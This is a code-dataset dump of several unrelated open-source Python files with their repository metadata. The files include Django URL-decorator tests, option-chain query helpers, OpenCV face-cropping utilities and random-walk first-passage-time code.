blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f9638e5e882356a6a93dca5d028d3a860e22bdd4 | 12560bce3420db3ebd3377c3b107e985b61ff368 | /urldecorators/tests/tests.py | 34e4c88d7b4cff7fecb40dd1d4a7d97cd337ea18 | [
"BSD-3-Clause"
] | permissive | mila/django-urldecorators | 0c167b850e52d1227295d9d7ce442e78ef5cfeda | 1594fee73aff0269f4d2edd489f4653bb6746936 | refs/heads/master | 2021-07-16T23:55:15.465823 | 2021-02-28T11:13:38 | 2021-02-28T11:13:38 | 288,947 | 5 | 2 | BSD-3-Clause | 2021-02-28T11:15:38 | 2009-08-26T18:10:14 | Python | UTF-8 | Python | false | false | 13,106 | py |
from django.core.exceptions import ImproperlyConfigured
from django.test import TestCase
from urldecorators import url
from urldecorators.tests import views
__all__ = ["ResolverTestCase", "ConfigurationTestCase", "ViewTypesTestCase"]
class ResolverTestCase(TestCase):
    """Integration tests for URL resolution with urldecorators.

    Each test hits a URL from the test urlconf and inspects the response.
    NOTE(review): assumes the test views echo back the positional and
    keyword arguments they were called with (plus marker strings appended
    by decorators/middleware) as ``r.args`` / ``r.kwargs`` on the response
    object -- confirm against urldecorators.tests.views.
    """

    # --- plain URLs and includes: args/kwargs routing ------------------
    def test_view_is_resolved(self):
        r = self.client.get("/")
        self.assertEqual((r.args, r.kwargs),((), {}))
    def test_args_are_parsed(self):
        r = self.client.get("/args/1/2/")
        self.assertEqual((r.args, r.kwargs),(("1", "2"), {}))
    def test_kwargs_are_parsed(self):
        r = self.client.get("/kwargs/1/2/")
        self.assertEqual((r.args, r.kwargs), ((), {"arg1":"1", "arg2":"2"}))
    def test_included_view_is_resolved(self):
        r = self.client.get("/inc/")
        self.assertEqual((r.args, r.kwargs), ((), {}))
    def test_included_args_are_parsed(self):
        r = self.client.get("/inc/args/1/2/")
        self.assertEqual((r.args, r.kwargs), (("1", "2"), {}))
    def test_included_kwargs_are_parsed(self):
        r = self.client.get("/inc/kwargs/1/2/")
        self.assertEqual((r.args, r.kwargs), (
            (), {"inc_arg1":"1", "inc_arg2":"2"}
        ))
    def test_kwargs_are_merged(self):
        # kwargs captured by the outer pattern merge with the included ones
        r = self.client.get("/kwargs/1/2/inc/kwargs/3/4/")
        self.assertEqual((r.args, r.kwargs), (
            (), {"arg1":"1", "arg2":"2", "inc_arg1":"3", "inc_arg2":"4"}
        ))

    # --- decorators applied via url(..., decorators=...) ---------------
    def test_decorators_are_applied_to_url(self):
        r = self.client.get("/decorators/")
        self.assertEqual(
            (r.args, r.kwargs),
            (("decorator 1 applied", "decorator 2 applied"), {})
        )
    def test_args_are_parsed_for_decorated_url(self):
        r = self.client.get("/decorators/args/1/2/")
        self.assertEqual((r.args, r.kwargs), (
            ("1", "2", "decorator 1 applied", "decorator 2 applied"), {}
        ))
    def test_kwargs_are_parsed_for_decorated_url(self):
        r = self.client.get("/decorators/kwargs/1/2/")
        self.assertEqual((r.args, r.kwargs), (
            ("decorator 1 applied", "decorator 2 applied"),
            {"arg1":"1", "arg2":"2"}
        ))
    def test_decorators_are_applied_to_include(self):
        r = self.client.get("/decorators/inc/")
        self.assertEqual((r.args, r.kwargs),(
            ("decorator 1 applied", "decorator 2 applied"), {}
        ))
    def test_args_are_parsed_for_decorated_include(self):
        r = self.client.get("/decorators/inc/args/1/2/")
        self.assertEqual((r.args, r.kwargs), (
            ("1", "2", "decorator 1 applied", "decorator 2 applied"), {}
        ))
    def test_kwargs_are_parsed_for_decorated_include(self):
        r = self.client.get("/decorators/inc/kwargs/1/2/")
        self.assertEqual((r.args, r.kwargs), (
            ("decorator 1 applied", "decorator 2 applied"),
            {"inc_arg1":"1", "inc_arg2":"2"}
        ))
    def test_kwargs_are_merged_for_decorated_include(self):
        r = self.client.get("/decorators/kwargs/1/2/inc/kwargs/3/4/")
        self.assertEqual((r.args, r.kwargs), (
            ("decorator 1 applied", "decorator 2 applied"),
            {"arg1":"1", "arg2":"2", "inc_arg1":"3", "inc_arg2":"4"}
        ))
    def test_decorators_are_applied_to_include_in_decorated_include(self):
        # decorators on an outer include propagate to nested includes
        r = self.client.get("/decorators/inc/inc/")
        self.assertEqual((r.args, r.kwargs), (
            ("decorator 1 applied", "decorator 2 applied"), {}
        ))
    def test_args_are_parsed_for_include_in_decorated_include(self):
        r = self.client.get("/decorators/inc/inc/args/1/2/")
        self.assertEqual((r.args, r.kwargs), (
            ("1", "2", "decorator 1 applied", "decorator 2 applied"), {}
        ))
    def test_kwargs_are_parsed_for_include_in_decorated_include(self):
        r = self.client.get("/decorators/inc/inc/kwargs/1/2/")
        self.assertEqual((r.args, r.kwargs), (
            ("decorator 1 applied", "decorator 2 applied"),
            {"inc_inc_arg1":"1", "inc_inc_arg2":"2"}
        ))

    # --- middleware applied via url(..., middleware_classes=...) -------
    def test_middleware_is_applied_to_url(self):
        r = self.client.get("/middleware/")
        self.assertEqual((r.args, r.kwargs), (
            ("middleware 1 applied", "middleware 2 applied"), {}
        ))
    def test_args_are_parsed_for_url_w_middleware(self):
        r = self.client.get("/middleware/args/1/2/")
        self.assertEqual((r.args, r.kwargs), (
            ("1", "2", "middleware 1 applied", "middleware 2 applied"), {}
        ))
    def test_kwargs_are_parsed_for_url_w_middleware(self):
        r = self.client.get("/middleware/kwargs/1/2/")
        self.assertEqual((r.args, r.kwargs), (
            ("middleware 1 applied", "middleware 2 applied"),
            {"arg1":"1", "arg2":"2"}
        ))
    def test_middleware_is_applied_to_include(self):
        r = self.client.get("/middleware/inc/")
        self.assertEqual((r.args, r.kwargs), (
            ("middleware 1 applied", "middleware 2 applied"), {}
        ))
    def test_args_are_parsed_for_include_w_middleware(self):
        r = self.client.get("/middleware/inc/args/1/2/")
        self.assertEqual((r.args, r.kwargs), (
            ("1", "2", "middleware 1 applied", "middleware 2 applied"), {}
        ))
    def test_kwargs_are_parsed_for_include_w_middleware(self):
        r = self.client.get("/middleware/inc/kwargs/1/2/")
        self.assertEqual((r.args, r.kwargs), (
            ("middleware 1 applied", "middleware 2 applied"),
            {"inc_arg1":"1", "inc_arg2":"2"}
        ))
    def test_kwargs_are_merged_for_include_w_middleware(self):
        r = self.client.get("/middleware/kwargs/1/2/inc/kwargs/3/4/")
        self.assertEqual((r.args, r.kwargs), (
            ("middleware 1 applied", "middleware 2 applied"),
            {"arg1":"1", "arg2":"2", "inc_arg1":"3", "inc_arg2":"4"}
        ))
    def test_middleware_is_applied_to_include_in_include_w_middleware(self):
        r = self.client.get("/middleware/inc/inc/")
        self.assertEqual((r.args, r.kwargs), (
            ("middleware 1 applied", "middleware 2 applied"), {}
        ))
    def test_args_are_parsed_for_include_in_include_w_middleware(self):
        r = self.client.get("/middleware/inc/inc/args/1/2/")
        self.assertEqual((r.args, r.kwargs), (
            ("1", "2", "middleware 1 applied", "middleware 2 applied"), {}
        ))
    def test_kwargs_are_parsed_for_include_in_include_w_middleware(self):
        r = self.client.get("/middleware/inc/inc/kwargs/1/2/")
        self.assertEqual((r.args, r.kwargs), (
            ("middleware 1 applied", "middleware 2 applied"),
            {"inc_inc_arg1":"1", "inc_inc_arg2":"2"}
        ))

    # --- ordering when middleware and decorators are combined ----------
    def test_middleware_is_appliled_before_decorators_to_url(self):
        r = self.client.get("/middleware-and-decorators/")
        self.assertEqual((r.args, r.kwargs), (
            ("middleware 1 applied", "middleware 2 applied",
             "decorator 1 applied", "decorator 2 applied"), {}
        ))
    def test_middleware_is_applied_before_decorators_to_include(self):
        r = self.client.get("/middleware-and-decorators/inc/")
        self.assertEqual( (r.args, r.kwargs), (
            ("middleware 1 applied", "middleware 2 applied",
             "decorator 1 applied", "decorator 2 applied"), {}
        ))
    def test_include_w_middleware_in_decorated_include(self):
        # outer decorators run before inner middleware markers are appended
        r = self.client.get("/decorators/inc/middleware/inc/")
        self.assertEqual((r.args, r.kwargs), (
            ("decorator 1 applied", "decorator 2 applied",
             "middleware 1 applied", "middleware 2 applied"), {}
        ))
    def test_decorated_include_in_include_w_middleware(self):
        r = self.client.get("/middleware/inc/decorators/inc/")
        self.assertEqual((r.args, r.kwargs), (
            ("middleware 1 applied", "middleware 2 applied",
             "decorator 1 applied", "decorator 2 applied"), {}
        ))
    def test_url_w_middleware_in_decorated_include(self):
        r = self.client.get("/decorators/inc/middleware/")
        self.assertEqual((r.args, r.kwargs), (
            ("decorator 1 applied", "decorator 2 applied",
             "middleware 1 applied", "middleware 2 applied"), {}
        ))
    def test_decorated_url_in_include_w_middleware(self):
        r = self.client.get("/middleware/inc/decorators/")
        self.assertEqual((r.args, r.kwargs), (
            ("middleware 1 applied", "middleware 2 applied",
             "decorator 1 applied", "decorator 2 applied"), {}
        ))

    # --- namespaced URL support ----------------------------------------
    def test_decorators_work_with_namespaced_urls(self):
        r = self.client.get("/namespace/decorators/")
        self.assertEqual((r.args, r.kwargs), (
            ("decorator 1 applied", "decorator 2 applied"), {}
        ))
    def test_middleware_works_with_namespaced_urls(self):
        r = self.client.get("/namespace/middleware/")
        self.assertEqual((r.args, r.kwargs), (
            ("middleware 1 applied", "middleware 2 applied"), {}
        ))
class ConfigurationTestCase(TestCase):
    """Tests for the different ways decorators/middleware can be declared
    (dotted-path strings, attribute-style iterable urlpatterns) and for
    the ImproperlyConfigured errors raised on invalid declarations.
    """
    def test_decorators_can_be_declared_as_string(self):
        r = self.client.get("/string/decorators/")
        self.assertEqual((r.args, r.kwargs), (
            ("decorator 1 applied", "decorator 2 applied"), {}
        ))
    def test_middleware_can_be_declared_as_string(self):
        r = self.client.get("/string/middleware/")
        self.assertEqual((r.args, r.kwargs), (
            ("middleware 1 applied", "middleware 2 applied"), {}
        ))
    def test_empty_string_as_view_name_raises(self):
        def func():
            # urlpatterns is intentionally unused; building it must raise
            urlpatterns = [
                url(r'^$', '', decorators=["urldecorators.tests.urls.decorator1"]),
            ]
        self.assertRaises(ImproperlyConfigured, func)
    def test_unresolvable_decorator_name_raises(self):
        def func():
            urlpatterns = [
                url(r'^$', views.sample_view, decorators=["does.not.exist"]),
            ]
        self.assertRaises(ImproperlyConfigured, func)
    def test_unresolvable_middleware_name_raises(self):
        def func():
            urlpatterns = [
                url(r'^$', views.sample_view, middleware_classes=["does.not.exist"]),
            ]
        self.assertRaises(ImproperlyConfigured, func)
    def test_decorators_can_be_used_in_iterable_urlpatterns(self):
        r = self.client.get("/attr/inc/decorators/")
        self.assertEqual((r.args, r.kwargs), (
            ("decorator 1 applied", "decorator 2 applied"), {}
        ))
    def test_middleware_can_be_used_in_iterable_urlpatterns(self):
        r = self.client.get("/attr/inc/middleware/")
        self.assertEqual((r.args, r.kwargs), (
            ("middleware 1 applied", "middleware 2 applied"), {}
        ))
    def test_decorators_can_be_applied_to_iterable_url(self):
        r = self.client.get("/attr/decorators/")
        self.assertEqual((r.args, r.kwargs), (
            ("decorator 1 applied", "decorator 2 applied"), {}
        ))
    def test_middleware_can_be_applied_to_iterable_url(self):
        r = self.client.get("/attr/middleware/")
        self.assertEqual((r.args, r.kwargs), (
            ("middleware 1 applied", "middleware 2 applied"), {}
        ))
class ViewTypesTestCase(TestCase):
    """Decorators and middleware must work regardless of how the view is
    defined: plain function, class instance, bound method, or a Django
    generic class-based view.
    """
    def test_decorators_work_with_func_view(self):
        r = self.client.get("/decorators/inc/func/")
        self.assertEqual((r.args, r.kwargs), (
            ("decorator 1 applied", "decorator 2 applied"), {}
        ))
    def test_middleware_works_with_func_view(self):
        r = self.client.get("/middleware/inc/func/")
        self.assertEqual((r.args, r.kwargs), (
            ("middleware 1 applied", "middleware 2 applied"), {}
        ))
    def test_decorators_work_with_class_view(self):
        r = self.client.get("/decorators/inc/class/")
        self.assertEqual((r.args, r.kwargs), (
            ("decorator 1 applied", "decorator 2 applied"), {}
        ))
    def test_middleware_works_with_class_view(self):
        r = self.client.get("/middleware/inc/class/")
        self.assertEqual((r.args, r.kwargs), (
            ("middleware 1 applied", "middleware 2 applied"), {}
        ))
    def test_decorators_work_with_method_view(self):
        r = self.client.get("/decorators/inc/method/")
        self.assertEqual((r.args, r.kwargs), (
            ("decorator 1 applied", "decorator 2 applied"), {}
        ))
    def test_middleware_works_with_method_view(self):
        r = self.client.get("/middleware/inc/method/")
        self.assertEqual((r.args, r.kwargs), (
            ("middleware 1 applied", "middleware 2 applied"), {}
        ))
    def test_decorators_work_with_generic_view(self):
        r = self.client.get("/decorators/inc/generic/")
        self.assertEqual((r.args, r.kwargs),(
            ("decorator 1 applied", "decorator 2 applied"), {}
        ))
    def test_middleware_works_with_generic_view(self):
        r = self.client.get("/middleware/inc/generic/")
        self.assertEqual((r.args, r.kwargs), (
            ("middleware 1 applied", "middleware 2 applied"), {}
        ))
| [
"miloslav.pojman@gmail.com"
] | miloslav.pojman@gmail.com |
92f786936e34101e74491e1be18a6b873e6c9c03 | a1a7752ee2d39d0482eb4dfad3bfcbc8759cd38d | /09_Birthday_Cake_Candles.py | a901bf85ec2641ec50ace6097e13c7ee3fc15bde | [] | no_license | waditya/HackerRank_Algorithms_Warmup | 80a4d4923733a0ad4d8ebdd89c30b0bf5e905b1f | c74ee328ed2064fa97d57c3791c084d576238ddc | refs/heads/master | 2018-10-05T06:36:29.742956 | 2018-06-12T05:01:09 | 2018-06-12T05:01:09 | 115,484,120 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 569 | py | #!/bin/python3
import sys
def birthdayCakeCandles(n, ar):
    """Return how many candles are the tallest (HackerRank problem).

    :param n: declared number of candles; unused, kept for the original
              call signature
    :param ar: list of candle heights
    :return: count of candles whose height equals the maximum
    """
    # The original sorted the list, located the max and scanned forward;
    # counting occurrences of the maximum is equivalent and O(n).
    return ar.count(max(ar))
# Script entry point: read the candle count and the space-separated
# heights from stdin (HackerRank input format), then print how many
# candles are tallest.
n = int(input().strip())
ar = list(map(int, input().strip().split(' ')))
result = birthdayCakeCandles(n, ar)
print(result)
| [
"noreply@github.com"
] | waditya.noreply@github.com |
446bf97de636b97dbc926fceb6f46fb2256c7d67 | fd932ae47ec222fb69185032ac1ffc0fe99c7fa7 | /optopsy/option_queries.py | 81ebe5d15f7a88d8fa8464a978513861fa2841bd | [
"MIT"
] | permissive | forestzh/optopsy | e7833730047ed54afe942344f6ad2d5507a60a43 | 3a43f6c5382f2936a9ded3a43918a862cc0425f2 | refs/heads/master | 2020-04-04T23:11:42.481789 | 2018-11-03T20:12:18 | 2018-11-03T20:12:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,721 | py | """
The goal of this module is to abstract away dataframe manipulation
functions and provide an easy to use interface to query for specific
option legs in a dataframe. All functions will return a new pandas
dataframe to allow for method chaining
"""
from optopsy.enums import Period, OptionType
from optopsy.data import fields
CALCULATED_FIELDS = ['abs_dist', 'dte']
ALL_FIELDS = [f[0] for f in fields] + CALCULATED_FIELDS
NUMERIC_AND_DATE_FIELDS = [
f[0] for f in fields if (f[2] == 'numeric' or f[2] == 'date')
] + CALCULATED_FIELDS
# PRIVATE METHODS ========================================================
def _convert(val):
    """Unwrap a Period enum member into its raw value; other values pass through."""
    if isinstance(val, Period):
        return val.value
    return val
# QUERY METHODS ==========================================================
def calls(df):
    """
    Filter the option-chain dataframe down to call options
    (option_type starting with 'c', case-insensitive).
    """
    is_call = df['option_type'].str.lower().str.startswith('c')
    return df[is_call]
def puts(df):
    """
    Filter the option-chain dataframe down to put options
    (option_type starting with 'p', case-insensitive).
    """
    is_put = df['option_type'].str.lower().str.startswith('p')
    return df[is_put]
def opt_type(df, option_type):
    """
    Filter the option chain for rows matching the given OptionType
    enum member; raises ValueError for any other argument type.
    """
    if not isinstance(option_type, OptionType):
        raise ValueError("option_type must be of type OptionType")
    return df[df['option_type'] == option_type.value[0]]
def underlying_price(df):
    """
    Return the mean of the distinct underlying prices recorded in the
    option chain for a given day.  Raises ValueError when the dataframe
    has no 'underlying_price' column.
    """
    if 'underlying_price' not in df:
        raise ValueError("Underlying Price column undefined!")
    distinct_prices = df['underlying_price'].unique()
    return distinct_prices.mean()
def nearest(df, column, val, tie='roundup', absolute=False):
    """
    Return dataframe rows containing the column item nearest to the
    given value.

    :param df: the dataframe to operate on
    :param column: numeric/date column to look up
    :param val: return values nearest to this param (Period enums unwrapped)
    :param tie: 'roundup' keeps the larger column value when several rows
                are equally near; 'rounddown' keeps the smaller
    :param absolute: compare abs(column) to val instead of the raw value
    :return: the filtered dataframe
    """
    if column not in NUMERIC_AND_DATE_FIELDS:
        raise ValueError("Invalid column specified!")
    # BUG FIX: previously the 'absolute' distance was computed but then
    # discarded -- the filter pipeline always re-derived the non-absolute
    # distance from df, so absolute=True had no effect on the selection.
    if absolute:
        data = df.assign(abs_dist=lambda r: abs(abs(r[column]) - _convert(val)))
    else:
        data = df.assign(abs_dist=lambda r: abs(r[column] - _convert(val)))
    results = (
        data
        .pipe(eq, 'abs_dist', data['abs_dist'].min())
        .drop(['abs_dist'], axis=1)
    )
    if tie == 'roundup' and len(results) != 1:
        return results[results[column] == results[column].max()]
    elif tie == 'rounddown' and len(results) != 1:
        return results[results[column] == results[column].min()]
    return results
def lte(df, column, val):
    """
    Rows of *df* where *column* is less than or equal to *val*.
    Raises ValueError for columns outside the numeric/date set.
    """
    if column not in NUMERIC_AND_DATE_FIELDS:
        raise ValueError("Invalid column specified!")
    return df[df[column] <= _convert(val)]
def gte(df, column, val):
    """
    Rows of *df* where *column* is greater than or equal to *val*.
    Raises ValueError for columns outside the numeric/date set.
    """
    if column not in NUMERIC_AND_DATE_FIELDS:
        raise ValueError("Invalid column specified!")
    return df[df[column] >= _convert(val)]
def eq(df, column, val):
    """
    Rows of *df* where *column* equals *val*.  Unlike the ordering
    filters, equality is allowed on every known field.
    """
    if column not in ALL_FIELDS:
        raise ValueError("Invalid column specified!")
    return df[df[column] == _convert(val)]
def lt(df, column, val):
    """
    Rows of *df* where *column* is strictly less than *val*.
    Raises ValueError for columns outside the numeric/date set.
    """
    if column not in NUMERIC_AND_DATE_FIELDS:
        raise ValueError("Invalid column specified!")
    return df[df[column] < _convert(val)]
def gt(df, column, val):
    """
    Rows of *df* where *column* is strictly greater than *val*.
    Raises ValueError for columns outside the numeric/date set.
    """
    if column not in NUMERIC_AND_DATE_FIELDS:
        raise ValueError("Invalid column specified!")
    return df[df[column] > _convert(val)]
def ne(df, column, val):
    """
    Rows of *df* where *column* differs from *val*.
    Raises ValueError for columns outside the numeric/date set.
    """
    if column not in NUMERIC_AND_DATE_FIELDS:
        raise ValueError("Invalid column specified!")
    return df[df[column] != _convert(val)]
def between(df, column, start, end, inclusive=True):
    """
    Rows of *df* where *column* lies in [start, end] (or (start, end)
    when inclusive=False).  Raises ValueError for columns outside the
    numeric/date set.
    """
    if column not in NUMERIC_AND_DATE_FIELDS:
        raise ValueError("Invalid column specified!")
    lo = _convert(start)
    hi = _convert(end)
    return df[df[column].between(lo, hi, inclusive=inclusive)]
| [
"noreply@github.com"
] | forestzh.noreply@github.com |
87f0f9add2a04e3e9af9682fd44a9797e7e44232 | 53a78f4a484f44774aa6c8c252da57c3a129c87b | /scripts/utils.py | 0e9797fe366361ae70f6f2b2058fe75454f86d4f | [] | no_license | alexey-semikozov/sticker-face | bd482ffaba2447c366368004c9d62b2b0385552a | 6cc691dc87ca3d8ab32308aaabd542cb7b7b8d80 | refs/heads/master | 2020-04-14T13:36:17.549559 | 2019-03-09T13:36:54 | 2019-03-09T13:36:54 | 163,873,357 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,661 | py | import cv2
import numpy as np
from PIL import Image
import queue
import itertools as it #from more_itertools import chunked
def detect_faces(f_cascade, colored_img, scaleFactor = 1.1):
    """Return a copy of *colored_img* with a green rectangle drawn around
    every face found by the Haar cascade *f_cascade*.

    The input image is never modified.
    """
    annotated = colored_img.copy()
    # The cascade detector operates on grayscale input.
    gray = cv2.cvtColor(annotated, cv2.COLOR_BGR2GRAY)
    # scaleFactor controls the image-pyramid step between detection scales.
    faces = f_cascade.detectMultiScale(gray, scaleFactor=scaleFactor, minNeighbors=5)
    for (x, y, w, h) in faces:
        cv2.rectangle(annotated, (x, y), (x + w, y + h), (0, 255, 0), 2)
    return annotated
# for one face on the image
def cut_face(f_cascade, colored_img, scaleFactor = 1.1):
    """Crop a square region around a detected face.

    If several faces are detected, the crop of the last one reported by
    the cascade is returned (matching the previous behaviour); if no face
    is found, None is returned.

    :param f_cascade: cv2 Haar cascade classifier
    :param colored_img: BGR image array; never modified
    :param scaleFactor: image-pyramid step for detectMultiScale
    :return: square face crop, or None when nothing was detected
    """
    img_copy = colored_img.copy()
    # Detection runs on a grayscale version of the image.
    gray = cv2.cvtColor(img_copy, cv2.COLOR_BGR2GRAY)
    faces = f_cascade.detectMultiScale(gray, scaleFactor=scaleFactor, minNeighbors=5)
    # BUG FIX: faceimg was previously unbound when no face was detected,
    # raising UnboundLocalError at the return; the dead counter 'i' and
    # commented-out imwrite are removed.
    faceimg = None
    for (x, y, w, h) in faces:
        # Square crop centred on the detection rectangle.
        r = max(w, h) / 2
        centerx = x + w / 2
        centery = y + h / 2
        nx = int(centerx - r)
        ny = int(centery - r)
        nr = int(r * 2)
        faceimg = img_copy[ny:ny + nr, nx:nx + nr]
    return faceimg
def edgedetect(channel):
    """Sobel gradient magnitude of a single image channel, clamped to 0-255."""
    grad_x = cv2.Sobel(channel, cv2.CV_16S, 1, 0)
    grad_y = cv2.Sobel(channel, cv2.CV_16S, 0, 1)
    magnitude = np.hypot(grad_x, grad_y)
    # Clamp into the displayable 8-bit range; hypot can exceed 255.
    magnitude[magnitude > 255] = 255
    return magnitude
def findSignificantContours (img, edgeImg):
    """Return the top-level contours covering a significant share of the
    image (sorted by area, largest last); as a side effect the selected
    contours are drawn onto *img* in green.
    """
    # NOTE(review): this 2-tuple unpacking matches OpenCV 2.x/4.x;
    # OpenCV 3.x returns (image, contours, hierarchy) -- confirm the
    # installed cv2 version.
    contours, heirarchy = cv2.findContours(edgeImg, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
    # Find level 1 contours
    level1 = []
    for i, tupl in enumerate(heirarchy[0]):
        # Each array is in format (Next, Prev, First child, Parent)
        # Filter the ones without parent
        if tupl[3] == -1:
            # Prepend the contour's own index so it can be looked up below.
            tupl = np.insert(tupl, 0, [i])
            level1.append(tupl)
    # From among them, find the contours with large surface area.
    significant = []
    tooSmall = edgeImg.size * 5 / 100 # If contour isn't covering 5% of total area of image then it probably is too small
    for tupl in level1:
        contour = contours[tupl[0]];
        area = cv2.contourArea(contour)
        if area > tooSmall:
            significant.append([contour, area])
            # Draw the contour on the original image
            cv2.drawContours(img, [contour], 0, (0,255,0),2, cv2.LINE_AA, maxLevel=1)
    # Sort ascending by area so the most significant contour comes last.
    significant.sort(key=lambda x: x[1])
    #print ([x[1] for x in significant]);
    return [x[0] for x in significant]
def scale_image(start_image, width = None, height = None):
    """Shrink *start_image* in place so it fits within the given bounds.

    Any missing (or zero/falsy) bound defaults to the image's current
    dimension.  Raises RuntimeError when neither bound is supplied.
    Returns the same (mutated) image object.
    """
    if not width and not height:
        # No width or height specified
        raise RuntimeError('Width or height required!')
    w, h = start_image.size
    bound_w = width if width else w
    bound_h = height if height else h
    start_image.thumbnail((bound_w, bound_h), Image.ANTIALIAS)
    return start_image
# from habr blog post
# from habr blog post
def dijkstra(start_points, w):
    """Multi-source Dijkstra distance transform over a 2D grid.

    Cells are 4-connected and stepping from cell p to cell q costs
    ``abs(w[q] - w[p])``.  Returns an array of shortest distances from
    the nearest start point to every cell.

    :param start_points: iterable of (row, col) seed cells
    :param w: 2D numpy array of cell values ("heights")
    :return: 2D numpy array of distances, same shape as *w*
    """
    # np.inf / plain bool replace the np.infty / np.bool aliases, which
    # were removed in recent NumPy releases.
    d = np.full(w.shape, np.inf)
    visited = np.zeros(w.shape, dtype=bool)
    q = queue.PriorityQueue()
    for x, y in start_points:
        d[x, y] = 0
        q.put((d[x, y], (x, y)))
    # Seed the queue with every unreached cell (lazy-deletion Dijkstra).
    for x, y in it.product(range(w.shape[0]), range(w.shape[1])):
        if np.isinf(d[x, y]):
            q.put((d[x, y], (x, y)))
    while not q.empty():
        _, p = q.get()
        if visited[p]:
            continue
        neighbourhood = []
        if p[0] - 1 >= 0:
            neighbourhood.append((p[0] - 1, p[1]))
        if p[0] + 1 <= w.shape[0] - 1:
            neighbourhood.append((p[0] + 1, p[1]))
        if p[1] - 1 >= 0:
            neighbourhood.append((p[0], p[1] - 1))
        if p[1] + 1 < w.shape[1]:
            neighbourhood.append((p[0], p[1] + 1))
        for x, y in neighbourhood:
            # the edge weight is the absolute height difference
            d_tmp = d[p] + np.abs(w[x, y] - w[p])
            if d[x, y] > d_tmp:
                d[x, y] = d_tmp
                q.put((d[x, y], (x, y)))
        visited[p] = True
    return d
"maxim_71rus_wow@mail.ru"
] | maxim_71rus_wow@mail.ru |
97edf149a1283818bdacab78f38e2d2fed9b5fdd | 5b5d164dcbbce48373d9b3c1e0476b8a49895363 | /pages/config/urls.py | ff71c59ece132e40edc18ce4e1dec33435bc05bc | [] | no_license | tay2001/pages-app | ecb32dcc9cf4a9861cf17fdbf4ba379fb1f6921c | 5243eb3830d44522135c1b7cd8c46522e1c99b3f | refs/heads/main | 2023-08-13T11:58:58.737312 | 2021-09-20T20:42:30 | 2021-09-20T20:42:30 | 407,016,505 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 815 | py | """config URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
# Project-level URL routes: the Django admin plus a catch-all delegation
# to the pages app's own urlconf.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('', include('pages.urls')),
]
| [
"noreply@github.com"
] | tay2001.noreply@github.com |
a31ecbb74f5021e8c507af43755f93938fed2646 | e7405390a21ce92a62f5617095ddb5ed3a8ab358 | /theory/lvps/base_mtl.py | 05fede0be2e5904f5c973369d7a12ff2db235be6 | [] | no_license | joshnies/turring-theory | 4d6351150da1fed059053115ff9f1b2526a8826a | 4b3054fd27589e78e864dbd7f2a38735663d385d | refs/heads/main | 2023-07-31T05:45:30.137915 | 2021-09-26T17:09:59 | 2021-09-26T17:09:59 | 392,284,647 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 674 | py | from theory.lvps.base_itl import ITL
from theory.veil import Veil
class MTL:
    """
    Base Macro Translation Layer for translating multi-line blocks and portions of sequences.
    Runs before the main neural network translation loop (including the ITL).

    Subclasses are expected to override :meth:`translate_all`.
    """
    def __init__(self, itl: ITL, veil: Veil):
        """
        :param itl: ITL instance.
        :param veil: Veil instance.
        """
        # Stored for use by subclass implementations of translate_all.
        self.itl = itl
        self.veil = veil
    def translate_all(self, file_contents: str) -> str:
        """
        Perform all micro-translations.
        :param file_contents: File contents.
        :returns: New file contents.
        """
        # Abstract hook: the base implementation is a no-op (returns None).
        pass
| [
"50473759+joshnies@users.noreply.github.com"
] | 50473759+joshnies@users.noreply.github.com |
f280bb51f93e7bc63a275933bd72fc8600dfd195 | f4abbd3b8a7b0cdc37e87737a7e9f80d9550fbf5 | /nettools/fpttools.py | c0165cdf0414dbaa5821fb8e60550f9d6b6b24f7 | [] | no_license | rcortini/mybiotools | a4e2320d839fc3d68b58036c84cbf61c9eb4d759 | 1a8f424b9196e27e27338aa636c0199822925de9 | refs/heads/master | 2020-06-06T11:17:37.222575 | 2019-06-19T12:09:05 | 2019-06-19T12:09:05 | 192,725,109 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,624 | py | import numpy as np
from pathos.multiprocessing import ProcessingPool as Pool
from scipy.special import gamma, jv
from scipy.linalg import eig
from .random_walks import jump_to, row_normalize_matrix
from mybiotools import error_message
def FPT(P, startsite, endsite):
    """
    Simulate a single random walk on the row-normalized cumulative-sum
    probability matrix *P* and return the number of jumps needed to reach
    *endsite* from *startsite*.  Caution: no sanity check is performed
    on P.
    """
    steps = 0
    current = startsite
    while current != endsite:
        current = jump_to(P[current])
        steps += 1
    return steps
def FPT_distribution(P, startsite, endsite, bins,
                     ntrials=None):
    """
    Estimate the first-passage-time distribution for walks on the
    row-normalized cumulative-sum probability matrix *P*, from
    *startsite* to *endsite*.  The histogram *bins* must be computed
    beforehand and passed in.

    Optional arguments:
        - ntrials: number of FPTs to sample (default 10*N, with N the
          dimension of P)
    """
    if ntrials is None:
        ntrials = P.shape[0] * 10
    samples = np.array([FPT(P, startsite, endsite) for _ in range(ntrials)])
    return np.histogram(samples, bins=bins, density=True)[0]
